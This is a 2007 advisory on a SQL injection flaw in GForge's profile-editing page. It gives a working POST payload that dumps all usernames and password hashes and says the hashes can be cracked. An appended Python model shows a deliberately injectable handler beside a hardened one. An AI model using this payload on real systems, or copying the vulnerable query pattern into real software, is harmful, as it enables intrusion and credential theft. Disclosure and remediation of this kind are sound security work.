GForge SQL Injection

September 13, 2007

Original Advisory: http://www.portcullis-security.com/179.php 

The file /www/people/editprofile.php appears to be vulnerable to SQL injection at multiple points.

The exploit is fairly easy: one POST request returns all the usernames and password hashes from the backend database.

The hashes can then be cracked using John the Ripper.

Exploit:

POST request to: /www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

Works against a PostgreSQL database :).

Refer to the paper for exploiting SQL injections against a PostgreSQL database.
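The root cause described above, as an added example that is not GForge's own code (which is not reproduced here): a toy model of the editprofile.php multi-delete handler, using Python's sqlite3 in place of PostgreSQL so it runs offline. The table name skills, its skills_id column, and the exact shape of the handler's query are assumptions; only the users table with user_name and unix_pw columns and the skill_delete[] parameter come from the advisory. The vulnerable version joins the raw skill_delete[] values straight into the IN (...) list, so a value that closes the parenthesis and appends UNION ALL SELECT leaks the users table into the response; the hardened version accepts only integer ids and passes them as bound parameters.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema and sample rows standing in for the GForge database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, unix_pw TEXT);
        CREATE TABLE skills (skills_id INTEGER PRIMARY KEY, user_id INTEGER, title TEXT);
        -- password hashes below are constructed placeholders, not real hashes
        INSERT INTO users VALUES (1, 'alice', '$1$placeholderhash1');
        INSERT INTO users VALUES (2, 'bob',   '$1$placeholderhash2');
        INSERT INTO skills VALUES (484, 1, 'perl');
        INSERT INTO skills VALUES (485, 1, 'sql');
        INSERT INTO skills VALUES (486, 2, 'c');
        """
    )
    return conn


def lookup_skills_vulnerable(conn, skill_delete):
    """Assumed shape of the flawed handler: the skill_delete[] values from the form
    are concatenated into the query text. Only the lookup step is modelled, because
    that is what echoes the injected rows back to the client."""
    sql = "SELECT title FROM skills WHERE skills_id IN (%s)" % ",".join(skill_delete)
    return [row[0] for row in conn.execute(sql).fetchall()]


def delete_skills_safe(conn, skill_delete):
    """Hardened handler: every id must be a plain decimal integer, and the ids are
    bound as parameters, so query structure can no longer be altered by form input."""
    ids = []
    for value in skill_delete:
        if not isinstance(value, str) or not value.isdigit():
            raise ValueError("skill_delete[] must contain only integer ids")
        ids.append(int(value))
    if not ids:
        return []
    # One placeholder per id; the values themselves never touch the SQL text.
    placeholders = ",".join("?" * len(ids))
    rows = conn.execute(
        "SELECT title FROM skills WHERE skills_id IN (%s)" % placeholders, ids
    ).fetchall()
    conn.execute("DELETE FROM skills WHERE skills_id IN (%s)" % placeholders, ids)
    conn.commit()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # Normal use: one skill id, one title back.
    print(lookup_skills_vulnerable(db, ["484"]))
    # The same UNION trick the advisory describes, against the concatenating handler:
    # the response now carries user_name||unix_pw rows alongside the skill title.
    print(lookup_skills_vulnerable(db, ["484) UNION ALL SELECT user_name||unix_pw FROM users--"]))
    # The hardened handler rejects the non-integer value before any SQL runs.
    try:
        delete_skills_safe(db, ["484) UNION ALL SELECT user_name||unix_pw FROM users--"])
    except ValueError as exc:
        print("rejected:", exc)
    print(delete_skills_safe(db, ["484", "485"]))
```

The validation step is what matters: once every element of skill_delete[] is known to be an integer, the placeholder list is built from the count of ids only, and the query structure is fixed regardless of what the browser sent. In the real application the delete should additionally be scoped to the logged-in user's own rows, which this toy model does not show.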
